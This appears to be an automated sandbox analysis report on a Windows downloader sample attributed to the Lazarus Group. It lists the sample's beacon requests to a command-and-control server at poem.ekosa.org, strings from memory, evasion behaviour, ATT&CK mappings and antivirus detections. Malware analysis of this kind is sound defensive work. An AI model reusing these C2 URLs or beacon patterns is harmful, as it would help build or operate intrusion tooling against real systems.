Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: poem.ekosa.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 11 Jan 2021 16:54:56 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: WVbU1Gf5p8.exe, WVbU1Gf5p8.exe, 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp.bat
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmp, WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn6780;
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn6786
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678:
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678B
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002522478.000000000139A000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678C:
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678F
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678H;c
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678T;O
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678V
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;q
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678j
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678k
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678l;
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678n
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678r
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678~
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?id=dn678~;
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmp, WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uD
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uE
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJ
Source: WVbU1Gf5p8.exe, 00000000.00000003.781276052.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uL
Source: WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uO
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uP
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uX
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ud
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uer
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6786
Source: WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;c
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678k
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;
Source: WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ul
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6um
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uon
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uq
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ur
Source: WVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urm
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpString found in binary or memory: http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uv
Source: WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002648212.000000000166A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Submitted sample is a known malware sampleShow sources
Source: WVbU1Gf5p8.exeInitial file: MD5: 69f7cde70cc22aceb5dd32ff1dc3f685 Family: Lazarus Group Alias: Operation DarkSeoul, Dark Seoul, Hidden Cobra, Hastati Group, Andariel Group, Unit 121, Bureau 121, NewRomanic Cyber Army Team, Bluenoroff, Group 77, Labyrinth Chollima, Operation Troy, Operation GhostSecret, Guardians of Peace, ZINC, NICKEL ACADEMY, APT-C-26, Silent Chollima, Lazarus Group Description: Lazarus Group, active since at least 2009, is an APT group that has been attributed to the North Korean. There are lots of campaigns connected, including Operation Blockbuster, Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, Ten Days of Rain, etc.In November 2014, it carried out destructive wiping attack against Sony Pictures Entertainment. In 2016, it attacked Bangladesh central banks and stole US$81 million. In the middle of 2017, the WannaCry malware which leverages the leaked EternalBlue exploits affected as many as 300,000 computers worldwide. References: Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231780
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB0
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123B40E
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123AF60
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123FA1C
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012346F7
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002630413.0000000001640000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs WVbU1Gf5p8.exe
Source: WVbU1Gf5p8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engineClassification label: mal60.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile created: C:\Users\user\AppData\Local\Temp\TMP9518.tmpJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: TMP
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: TMP
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: .bat
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: CPE:%08x
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCommand line argument: DFE:%08x
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: WVbU1Gf5p8.exeVirustotal: Detection: 71%
Source: WVbU1Gf5p8.exeReversingLabs: Detection: 66%
Source: WVbU1Gf5p8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012445B5 push esi; ret
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232E86 push ecx; ret
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeThread delayed: delay time: 180000
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exe TID: 3296Thread sleep count: 78 > 30
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exe TID: 3296Thread sleep time: -14040000s >= -30000s
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012385AB FindFirstFileExA,
Source: WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232C32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01231EB0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01235C5E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_0123A191 GetProcessHeap,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232D83 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232C32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01236B11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232796 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: WVbU1Gf5p8.exe, 00000000.00000002.1002760838.0000000001EC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232E9B cpuid
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_01232B24 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection1Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information11Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WVbU1Gf5p8.exe71%VirustotalBrowse
WVbU1Gf5p8.exe67%ReversingLabsWin32.Downloader.SilverRage
WVbU1Gf5p8.exe100%AviraTR/Dldr.Agent.wtwyi
WVbU1Gf5p8.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.WVbU1Gf5p8.exe.1230000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.0.WVbU1Gf5p8.exe.1230000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
poem.ekosa.org0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://poem.ekosa.org/intro/info/info.asp?id=dn678C:0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678~0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uon0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn67860%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uX0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678B0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6780%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp.bat0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678l;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uL0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn67860%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uO0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn6780;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uP0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678:0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;q0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn6780%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uer0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ud0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678n0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678r0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;c0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678k0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678k0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678j0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678~;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678T;O0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uv0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678H;c0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678V0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6um0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uq0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urm0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ur0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uE0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJ0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?id=dn678F0%Avira URL Cloudsafe
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
poem.ekosa.org
210.116.91.80
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://poem.ekosa.org/intro/info/info.asp?id=dn678false
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ufalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://poem.ekosa.org/intro/info/info.asp?id=dn678C:WVbU1Gf5p8.exe, 00000000.00000002.1002522478.000000000139A000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678~WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uonWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6786WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uXWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
